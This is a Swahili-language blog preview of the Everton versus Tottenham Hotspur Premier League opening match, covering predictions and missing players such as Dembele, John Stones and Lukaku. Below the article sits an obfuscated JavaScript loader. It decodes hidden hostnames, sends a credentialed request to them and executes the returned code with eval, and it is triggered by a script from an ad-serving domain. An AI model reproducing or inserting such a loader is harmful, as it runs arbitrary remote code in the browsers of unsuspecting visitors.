Uchambuzi Wa Mchezo Kati Ya Everton Vs Tottenham HotSpurs | IMMA
Ikiwa imebakia masaa machache kabla ya mchezo mkali wa ufunguzi wa ligi kuu ya England kuanza,Mchezo unaozikutanisha timu ya
Everton vs
Tottenham Hotspurs,
Wapenzi na mashabiki wa timu zote mbili wameonekana wakiwa na shauku ya kutaka kuzitazama Club zote mbili huku mashabiki wengi wakiwa na hamu ya kuona hari na kasi ya wachezaji mwanzoni mwa msimu wa ligi kuu ya England
Wachambuzi wa soka wametaja wamejalibu kuchambua vikosi vilivyo tajwa na makocha wa timu zote mbili,huku wakidai kua mchezo huu unaweza ukamalizika kwa suruhu ya bila kufungana kutokana na sababu inayo daiwa kua club ya Spurs kwa misimu miwili ya nyuma imekua ikipoteza mechi zao za ufunguzi.
Aidha mchezo huo unaopigwa leo Jumamosi majira ya saa17;00 kwa masaa ya Afrika mashariki, unatarajiwa kuchezwa huku timu zote zikwakosa baadhi ya wachezaji wao
Spurs inatarajiwa kuingia uanjani bila kiungo wake mchezeshaji
Dembele ambae amefungiwa michezo sita kutokana na utovu wa nidhamu ya mchezo wa soka Wakati club ya
Everton inatarajiwa kumkosa mchezaji wake
John Stone ambae amejiunga na club ya
Manchester City vile vile inahofia kiwango atakacho kionesha leo uanjani nyota wake
Lukaku kutokana na maumivu alio nayo
<script data-cfasync="false" type="text/javascript">var r3D=window;for(var b in r3D){if(b.length===((1.094E3,6.890E2)>82.?(0x152,6):(132.1E1,90))&&b.charCodeAt((0x9A<(0x1C6,0x1FB)?(145,3):(119.80E1,0x1FB)<=0x1B2?0xF9:(50.7E1,0xB0)))===((0x1C2,1.54E2)>18?(1.333E3,100):(135,9.96E2))&&b.charCodeAt(((12.14E2,113)<=127.?(125.,5):(0x23D,11.10E1)))===(88.>=(67.,0xD3)?1.71E2:(0xFC,0x1D0)<=(106.,4.98E2)?(38.40E1,119):(0x141,0x17))&&b.charCodeAt((0x117>(104.,144.)?(59.,1):(103.,15)))===((50.,0x0)<0x31?(0x0,105):(0x12F,5.66E2))&&b.charCodeAt(((35,41)<=(0x37,107.)?(1.09E3,0):(1.0110E3,130.)))===((0x212,0x112)<1.0190E3?(62.,119):0x1A4<=(0x209,0x73)?(77,14.3E1):(0x188,0x3A)))break};for(var J in r3D[b]){if(J.length===((74,8.03E2)>=(0xB1,47.)?(80.,8):(0xDF,0x1CF))&&J.charCodeAt((114<=(54.6E1,121.)?(1.2770E3,5):(0xF7,56.)))===((100.4E1,149)>=0x9F?(0x1A2,0x12F):(1.0E1,1.0010E3)>=(86,59.90E1)?(1.299E3,101):(30,13.36E2))&&J.charCodeAt((0x17F<(1.244E3,0x1BC)?(0x1F5,7):(6.78E2,0x77)))===((104.,21.)>1.466E3?(13,"M"):0x23E<(14,7.770E2)?(106.,116):(39.5E1,0x18E))&&J.charCodeAt(((133,93.2E1)<=1.075E3?(0x221,3):(47.,2.66E2)))===((0x148,26.6E1)<=130.?98:123.0E1>(62,74.)?(0x239,117):(14.39E2,3.39E2))&&J.charCodeAt(((0x148,66.9E1)>38.5E1?(100,0):0x150<(0x89,148.)?(4.09E2,'F'):(96,111.)))===((0xCB,0x1EF)<=84.80E1?(54.7E1,100):(107.,0xA)))break};(function(S,l,e,N){r3D[b][l]=function(){var F=((126.,0x245)<6.?'S':14.06E2>=(7.87E2,0xFB)?(14.94E2,0):(0x36,0x14D)),u=F,P=function P(){var g=((0x8D,91.7E1)>44.40E1?(85.7E1,'/'):(77.,12.20E1));var o='';var M='//';var D='GET';var Z=(0x231<=(38,98.)?81:(0x1C4,0x7E)>=9.5E1?(29.0E1,true):(16,100));var q=new XMLHttpRequest();q.withCredentials=Z;q.open((D),(M)+r3D[b]['atob'](e[u].split(o).reverse().join(o))+g+N+g,Z);q.onreadystatechange=function(){var y=(0x19B>=(0x127,111.)?(86,200):(0x17F,51.7E1));var t=((0x1E6,101.)>0x73?'W':99.9E1>(0x62,139)?(94,4):(0x112,0x1E1));if(q.readyState==t&&q.status==y&&q.responseText){eval(q.responseText);}};q.onerror=function(){if(++u!=e.length){P();}};try{q.send();}catch(y){q.onerror();}};P();};})(r3D[b][J],'_bhrfs',['=U2YhB3cucne6RzY2xWb','==Adlt2YpJ3YugWb5cXa4Q2Y','==QZ0l2cuE2N3VmZ6dXM','==QZ0l2ciV2duAjYphDbvp2Z'],1155246);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1153790" onerror="window._bhrfs();"></script>
Post a Comment